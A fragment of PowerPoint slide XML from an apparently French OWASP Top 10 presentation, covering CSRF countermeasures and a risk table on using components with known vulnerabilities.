                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Demander à </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l’utilisateur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ré-authentifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vérifier</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>que</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> la </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>demande</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>n’est</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> pas </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>automatisée</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (par  ex., avec  un test </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CAPTCHA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>peut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aussi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>protéger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>contre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attaques</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323232"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Falsification de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>requête</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>intersite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>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A8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="Group 28"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-3206" y="914400"/>
            <a:ext cx="6658448" cy="480859"/>
            <a:chOff x="26680" y="1014596"/>
            <a:chExt cx="6658448" cy="480859"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="3" name="Group 29"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="26680" y="1014596"/>
              <a:ext cx="6658448" cy="480859"/>
              <a:chOff x="26680" y="997424"/>
              <a:chExt cx="6658448" cy="480859"/>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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>       </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>      </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vulnérabilités</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>         </a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="4"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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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solidFill>
                      <a:prstClr val="black"/>
                    </a:solidFill>
                  </a:endParaRPr>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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Vecteurs</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>d’Attaque</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t> </a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>   Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Techniques</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr eaLnBrk="0" hangingPunct="0">
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgbClr>
                  </a:solidFill>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26680" y="1280701"/>
                <a:ext cx="1072731" cy="194925"/>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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Agents de Menace</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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rgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Impacts</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="0" hangingPunct="0"/>
                <a:r>
                  <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="4E8542">
                        <a:lumMod val="50000"/>
                      </a:srgbClr>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Métier</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="4E8542">
                      <a:lumMod val="50000"/>
                    </a:srgb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solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:endParaRPr>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Tree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="769682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3234480025"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="951722"/>
          <a:ext cx="6858000" cy="2722922"/>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9591">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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fr-FR" sz="1000" noProof="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96931">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Exploitation</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MOYENNE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Prévalence</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DIFFUSION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fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Détection</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>DIFFICILE</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Im</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>pact</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>MODÉRÉ</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR"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fr-FR" sz="1000" b="1" noProof="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>?</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" b="1" noProof="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16481">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr lvl="0" algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Certains composants vulnérables (Ex:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> bibliothèques ou </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>framework</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>) peuvent être identifiés à l’aide d’outils automatisés qui peuvent être utilisés au delà des attaques ciblées par des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>hacktivistes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>L’attaquant utilise des outils manuels ou des scanners afin d’identifier un</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> composant vulnérable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>. Il personnalise si besoin l</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>’exploit</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> et exécute leur attaque. Plus le</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> composant </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>est imbriqué dans l’application, plus il est difficile pour l’attaquant de l’exploiter.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="dk1"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>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vl="0" algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Toutes les applications sont potentiellement vulnérables, notamment parce que leurs développeurs ne s’assurent pas de la mise à jour de ses différents composants. Dans la plupart des cas, les développeurs ne connaissent même pas tous les composants sur lesquels reposent leur application, sans même parler des numéros de version correspondants. Les dépendances entre composants aggravent d’autant plus la situation.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="800" b="0" baseline="0" noProof="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lvl="0" algn="just"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="800" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
